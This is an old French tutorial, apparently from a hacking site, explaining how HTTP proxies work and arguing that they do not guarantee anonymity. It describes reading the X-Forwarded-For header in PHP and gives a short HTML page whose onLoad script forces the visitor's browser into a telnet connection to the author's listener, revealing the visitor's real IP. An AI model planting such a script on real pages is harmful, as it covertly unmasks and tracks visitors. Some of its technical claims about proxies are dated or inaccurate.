Comme vous le saviez sûrement, il existe un moyen très simple de naviguer
sur Internet anonymement: en utilisant un proxy. Par anonymement je veux
simplement dire que votre adresse IP est en quelque sorte masquée par une
autre. Je vais vous démontrer dans cet article que l'anonymat en utilisant
un proxy est loin d'être parfait...
Qu'est-ce qu'un proxy?
Pour commencer, il est important de savoir ce qu'est un proxy. C'est une
machine redirigeant les paquets reçus et envoyés par une autre machine.
C'est une sorte de relais entre deux machines. Voici un petit croquis
illustrant ces propos:
A la base, ils sont prévus pour stocker d'énormes quantités de données,
comme par exemple des images ou des textes. Qu'elle en est l'utilité? Et
bien supposons que vous voulez atteindre un site en utilisant un proxy et
que le site a été stocké auparavant par ce dernier. Le proxy va vous
afficher ce qu'il a stocké, ce qui va accélérer l'affichage du site.
Les proxies peuvent également être utilisés afin de masquer son adresse IP
(rappel: une adresse IP est une suite de 4 nombres allant de 0 à 255 qui
identifient votre machine sur un réseau). Lorsque vous allez sur un site,
c'est l'adresse IP su serveur qui sera vue et non la vôtre.
Il est important de signaler que les proxies n'utilisent que le protocole
HTTP. C'est pour ça que la plupart des proxies que vous trouverez auront
comme port 80, 8080 ou 3127, ports qui sont prévus pour le protocole HTTP.
Où trouver un proxy?
Le web regorge de sites proposant de grandes listes de proxies. En voici
quelques uns:
- http://www.proxyblind.org
- http://www.anonymitychecker.com
- http://www.cybersyndrome.net
Les proxies sont classés selon leur vitesse et leur niveau d'anonymat.
J'ai trouvé un proxy. Et maintenant?
Pour utiliser un proxy, vous pouvez soit configurer votre navigateur pour
qu'il s'y connecte directement(1), soit utiliser un programme qui le fera
pour vous(2).
_1: Prenons par exemple Internet Explorer. Allez dans outils -> options
Internet. Choisissez l'onglet connexions, cliquez sur paramètres, cochez
l'option "utiliser un serveur proxy" et tapez les informations requises.
_2: Vous pouvez télécharger Multiproxy (http://www.multiproxy.org). Pour plus
d'informations sur son utilisation, je vous renvoye au tutoriel suivant:
http://www.securityhack.net/?page=multiproxy
Et maintenant, je suis anonyme?Pas vraiment, et je vais vous le démontrer!
Tout d'abord, il est important de vous rappeler que les proxies logguent
toutes connexions entrantes et sortantes. Donc même si vous passez par un
proxy pour être "anonyme" sur un site, vous ne l'êtes pas pour le proxy!
Maintenant je vais vous montrer deux façons de pouvoir voir votre IP bien
que vous passiez par un proxy.
_Méthode 1: PHP
Je tiens tout d'abord à signaler que cette méthode ne marche pas tout le
temps. Vous comprendrez plus tard pourquoi.
Lorsque vous voulez visualiser un site, vous envoyez une requête au proxy,
qui lui fait suivre vers le serveur cible. En faisant suivre votre requête,
le proxy envoye également des variables d'environnement (6 au maximum) dans
le header, dont une qui se nomme HTTP_X_FORWARDED_FOR. Cette dernière
indique l'adresse IP de la machine qui a envoyé la requête.
En PHP, il est
possible de récupérer cette valeur très facilement. Voici un exemple:
Vous pouvez essayer de mettre cette page chez votre hébergeur et la
visualiser en utilisant un proxy. Votre véritable adresse IP s'affichera.
Si vous avez un site vous pouvez créer, par exemple, un fichier log
indiquant les vraies IP de vos visiteurs de cette manière :
Je vous ai dit auparavant que cette méthode ne marche tout le temps. Ceci
est dû au fait que certains proxies n'envoyent pas cette variable dans le
header. De plus, si la personne utilise des proxies en chaîne, nous n'aurons
que l'adresse IP de l'avant-dernier proxy, étant donné que le dernier proxy
croira que la requête a été envoyée par l'avant-dernier.
_Méthode 2: Utiliser un autre protocole
Cette méthode est bien plus intéressante. Je vous ai dit précédemment que
les proxies utilisent le protocole HTTP pour envoyer et reçevoir des
données. Donc si nous utilisons un autre protocole, le proxy sera en quelque
sorte bypassé. Voici un petit schéma expliquant ceci:
Si vous ne le saviez pas déjà, votre navigateur accepte différents
protocoles outre HTTP, comme par exemple Telnet, FTP ou Gopher. Si par
exemple vous tapez telnet://www.google.com dans votre navigateur, vous
établirez une connexion avec le serveur de google par le protocole Telnet.
Dans notre cas, nous allons établir une connexion entre nous et la personne
utilisant un proxy. Vous pouvez créer une page HTML comme celle-ci:
[code]
<html>
<head>
<script>
function getrealip()
{
window.location.href = 'telnet://votre_adresse_ip:1234' //le port n'a pas
d'importance
}
</script>
<body onLoad="getrealip()">
</body>
</html>
[/code]
Lors du chargement de cette page, une session Telnet sera établie entre vous
et la personne visualisant la page. Ce n'est pas très discret certes, mais
ce n'est qu'un exemple.
Il vous faut désormais être capable de reçevoir cette session. Vous pouvez
soit utilser NetCat, soit un listener de port. Dans le deuxième cas, je vous
conseille Plisten 2.3 (http://www.i-schutz.de/plisten.zip). Vous devrez
mettre en écoute le port que vous avez indiqué dans la page HTML. Ainsi vous
aurez la vraie adresse IP de la personne visitant la page, qu'elle utilise
un proxy ou pas.
Source: Proxies and Other Stuff - L0rky S0ul
Home
